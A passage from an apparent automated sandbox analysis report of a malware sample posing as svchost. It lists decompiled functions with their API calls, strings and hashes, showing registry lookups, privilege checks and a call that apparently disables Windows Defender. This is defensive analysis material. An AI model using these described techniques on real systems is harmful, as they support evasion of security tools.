                                                                                                                                                                                                              • String ID: 75775DDDa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-3143690122
                                                                                                                                                                                                              • Opcode ID: b7a00cd7abbf954168663e2f584b857d0f50b81529c8a2a6f9a69578f0d61b23
                                                                                                                                                                                                              • Instruction ID: f3fc2fb503c812b200b83a51a566d01f5414661dcd19844e1fc714f9956927f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7a00cd7abbf954168663e2f584b857d0f50b81529c8a2a6f9a69578f0d61b23
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37310A70E4122C66DB25EB65CC49FDE7B7CEF05B04F00469CF549E2280EBB04A848BE1
                                                                                                                                                                                                              Function 02646B10 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646B41
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646B5F
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02646B7A
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000001,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646BA1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646C1A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646C21
                                                                                                                                                                                                              • memset.MSVCRT ref: 02646C35
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646C4E
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02646C5C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 75775DDDa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-3143690122
                                                                                                                                                                                                              • Opcode ID: 6cf19f72aa8e23fe67618559c8d68b1d81d57411687e0e0b509ace573829546a
                                                                                                                                                                                                              • Instruction ID: f97545a00be90b8cffaa49780004e6178bb647dc65e010f625b5c2569225f320
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cf19f72aa8e23fe67618559c8d68b1d81d57411687e0e0b509ace573829546a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F831E970D41269AAEB25DB64CC49FDE7B7CEF15704F00469CE54AE6280EBB447848BA1
                                                                                                                                                                                                              Function 02664880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02647F74), ref: 02664895
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648AC
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02647F74), ref: 026648CA
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 026648E2
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02647F74), ref: 02664908
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 0266493B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0266494C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0266495E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266496F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                              • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                              • API String ID: 1998047302-3691563785
                                                                                                                                                                                                              • Opcode ID: 9e6427e6ae90fb6ec752390d9cb9a505f08881173cff6222f59465548b7eca1a
                                                                                                                                                                                                              • Instruction ID: bfbb5fb19223cb0dab3582a8bb4c4f833d3158c144bbfb2222ca227caa49f799
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6427e6ae90fb6ec752390d9cb9a505f08881173cff6222f59465548b7eca1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E231E771D802097FEB20CBA4CC8CFFE7BB8BB44305F444698EA4666140DF749544CB60
                                                                                                                                                                                                              Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                              • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                              Function 02664FF0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665023
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665032
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02665039
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665051
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02665068
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266506E
                                                                                                                                                                                                                • Part of subcall function 026541E0: GetProcessHeap.KERNEL32(00000008,02665097,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 026541FE
                                                                                                                                                                                                                • Part of subcall function 026541E0: HeapAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654205
                                                                                                                                                                                                                • Part of subcall function 026541E0: memset.MSVCRT ref: 02654215
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 0266508F
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650B6
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02665000
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                              • API String ID: 2345603349-374730529
                                                                                                                                                                                                              • Opcode ID: 093f6b603d55f8ecf60cbfd80e437cc93faf5c077abf79fd52abda8ec1d13fde
                                                                                                                                                                                                              • Instruction ID: f7fbca912e6631c088f8af1b4149bfb815ce0314855e11ac684bc1964c96fb4e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 093f6b603d55f8ecf60cbfd80e437cc93faf5c077abf79fd52abda8ec1d13fde
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1214B71D00256BBD72196648C49FBFB7BDAFC4701F604659F943A7240EB70EA4087E0
                                                                                                                                                                                                              Function 02652570 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02652587
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,76F8F550,00000000), ref: 0265259E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,76F8F550,00000000), ref: 026525AB
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,?,76F8F550,00000000), ref: 026525E7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(02699F08,00000000,00000104,00000000,00000001,?,76F8F550,00000000), ref: 02652611
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02652620
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,76F8F550,00000000), ref: 02652623
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02652630
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,76F8F550,00000000), ref: 02652633
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 757758cda
                                                                                                                                                                                                              • API String ID: 780088666-941893065
                                                                                                                                                                                                              • Opcode ID: fc4d59fd98ed7ac85742b13b2feb07e20c62fd4c2b0361e9f66d7e3268c8caba
                                                                                                                                                                                                              • Instruction ID: 09993310e1071bdba4e9ff5403785481f4b493b12ebae7d4678cd616a7ad76da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc4d59fd98ed7ac85742b13b2feb07e20c62fd4c2b0361e9f66d7e3268c8caba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6112931A8131577EB205A345C29FDF7BACAB90B11F510654FD86EB2C0EFE198C08AE4
                                                                                                                                                                                                              Function 02654EA7 Relevance: 16.6, APIs: 11, Instructions: 77memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02654EFF
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02654F02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02654F0F
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 02654F12
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02654F2A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02654F2D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02654F3A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02654F3D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02654F53
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02654F5D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02654F67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 278890334-0
                                                                                                                                                                                                              • Opcode ID: 27ce3c36ef4dfbba2664f403723e381f76d45132d12c772fba94361621741ffa
                                                                                                                                                                                                              • Instruction ID: e1772a12286a5cb4755602380e9294ad1bc05b9ebfd5c9031fb844445ae32f9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27ce3c36ef4dfbba2664f403723e381f76d45132d12c772fba94361621741ffa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6521C331A052646ADB109FB99C48FDF7B6CEF88715F050499F946D7240DE30D490CBA0
                                                                                                                                                                                                              Function 02654780 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265478A
                                                                                                                                                                                                              • memset.MSVCRT ref: 026547C0
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 026547E7
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 0265480A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 0265487D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02654884
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654894
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 026548C2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1484339481-3673152959
                                                                                                                                                                                                              • Opcode ID: c3aa1e53ecdbecb347ed692c22a698b0dc5f63e10c5ae39a41fc9ff46118a6a0
                                                                                                                                                                                                              • Instruction ID: f02c6007046d45eb2f5ae858e0355babb01f69a8108f21c6da7d8be2e3d70fc1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3aa1e53ecdbecb347ed692c22a698b0dc5f63e10c5ae39a41fc9ff46118a6a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3041E6329002E9ABDB25CE659C19FDEBBB8AF81B04F1542D4ED45A7200DF34D645CBA1
                                                                                                                                                                                                              Function 02643910 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02643969
                                                                                                                                                                                                              • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 0264397C
                                                                                                                                                                                                              • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02643993
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026439BD
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026439E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                              • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                              • API String ID: 844136142-2194319270
                                                                                                                                                                                                              • Opcode ID: 2c8e69ceaee626a153899876e0d8224f8459fb5d9f4b37616d3e058e8fb9143b
                                                                                                                                                                                                              • Instruction ID: 5c14d76a4ad744ff4b9e67145926ae9e4c5a09dbb445386bbfe5fd5a8dc151c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c8e69ceaee626a153899876e0d8224f8459fb5d9f4b37616d3e058e8fb9143b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A92105725402087BE7219E08DC84FFE77FCEB44715F548695F84A96201EBB09BA8CBA0
                                                                                                                                                                                                              Function 0265A060 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265A068
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,0265A227), ref: 0265A09F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(0265A227,757759d9a,00000000,?,00000000,?), ref: 0265A0BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(0265A227), ref: 0265A0C6
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 0265A0F9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,757759d9a,00000000,?,00000000,?), ref: 0265A116
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0265A120
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 757759d9a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-774380122
                                                                                                                                                                                                              • Opcode ID: b6de70821344ab17b0c4372735290205429a8804fb3c79d9564b50fbbf4a815d
                                                                                                                                                                                                              • Instruction ID: 2b72cb33274e3fe0b171feaa8cbd083fb55730e4c10a8890420ef73e616c3d64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6de70821344ab17b0c4372735290205429a8804fb3c79d9564b50fbbf4a815d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B212F75E50219FBEB10DBE4CC85FEEBBB8EF44704F504659E902E6180E7B4AA448B90
                                                                                                                                                                                                              Function 026536B0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 026536B8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 026536EF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,75775991a,00000000,?,00000000,?), ref: 0265370C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02653716
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02653749
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,75775991a,00000000,?,00000000,?), ref: 02653766
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02653770
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 75775991a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-2594810730
                                                                                                                                                                                                              • Opcode ID: a8a52d739bde1fd0c571cd22773f711afc99980c507ba533891aa149f175e006
                                                                                                                                                                                                              • Instruction ID: df60f9de2c6afb7aea073ed7d0682f8c7ee62059ba6a41d5a3ac56b9c6329446
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8a52d739bde1fd0c571cd22773f711afc99980c507ba533891aa149f175e006
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99215375E40219FBEB10DFE4CC85FEEBBB8EF44B44F504689E902E6240E7B466548B94
                                                                                                                                                                                                              Function 02643420 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02643428
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02655B76), ref: 0264345F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02655B76,7577584ba,00000000,?,00000000,?), ref: 0264347C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02655B76), ref: 02643486
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 026434B9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,7577584ba,00000000,?,00000000,?), ref: 026434D6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 026434E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
